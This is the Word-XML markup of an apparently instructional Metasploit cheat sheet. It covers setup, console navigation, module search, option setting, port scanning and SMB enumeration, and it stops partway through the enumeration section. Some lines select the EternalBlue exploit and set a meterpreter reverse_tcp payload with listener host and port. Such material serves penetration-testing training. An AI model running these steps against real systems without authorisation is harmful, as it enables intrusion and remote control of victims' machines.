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FFAC" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>Getting Started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186A1236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Installation and Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38495D99" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Update Metasploit (Kali Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71988CB6" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>sudo apt update &amp;&amp; sudo apt install metasploit-framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045B0746" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3332C44C" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Start PostgreSQL database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA17678" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>sudo systemctl start postgresql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764AB1C8" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A933DD8" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Initialize Metasploit database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB8486E" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>sudo msfdb init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BF904E" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D0FF35A" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Launch Metasploit console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F79691" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60580E78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Basic Console Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2FEA9C" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Get help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2248346C" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470FCD3B" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44411A8A" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10A3EC43" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Update Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAB8ECB" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>msfupdate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F91F462" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D595082" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Exit Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06725D47" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C711C4C" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A576F98" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>Core Commands and Navigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1760E7EC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Information and Search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAE0A12" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Show available modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC53D5D" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>show exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCFF71F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78482E09" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>show auxiliary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041AFDF1" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>show post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8CC4F8" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:lastRenderedPageBreak/>
        <w:t>show encoders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256D1D56" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>show nops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660B2B68" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="558D1357" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Search for modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202BD34A" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>search &lt;keyword&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5579D3" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>search type:exploit platform:windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062F797C" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>search cve:2017-0144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665437C0" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47EBB94F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Get module information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3930EF81" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>info &lt;module_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2560FF9B" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153AABB0" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>show missing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D93244" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>show targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556A1E70" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631E9051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Module Selection and Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26936744" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Use a module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FED6E7F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use &lt;module_path&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B4F353" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E7944B" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0930AC42" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Back out of current module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4D1D7F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4871607A" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="408F00A0" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Show current module options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4917C341" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAA793E" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>show advanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FA1731" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>show evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A587A35" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F552111" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Set module options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE24C89" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set RHOSTS 192.168.1.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679F08EC" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set RHOST 10.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2627D0" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set LHOST 192.168.1.50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D24DD9" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C015E43" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8A27C7" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E24C54D" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Unset options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B1E3CE" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>unset RHOSTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7D1E97" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>unset all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0B6F02" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AAE65C9" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Set global variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F83A37C" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>setg RHOSTS 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7823D995" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>setg LHOST 192.168.1.50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125F2DFB" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>Reconnaissance and Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6873AB9B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Port Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388B46B4" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># TCP port scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522448B9" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/portscan/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5506B92C" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set RHOSTS 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFAB043" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set PORTS 1-1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1548EE08" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E06DC4" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21DFCF46" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># SYN scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221F6675" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/portscan/syn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AA488F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set RHOSTS target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AE5651" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F321607" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F83D1A7" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Service version detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0EB59A" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/http/http_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2259CF28" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set RHOSTS 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6CEEE5" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7015BE53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Service Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D336F04" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># SMB enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09369F7C" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/smb/smb_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F90FFE9" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/smb/smb_enumshares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B65966" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/smb/smb_enumusers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16906A09" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="00851954">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
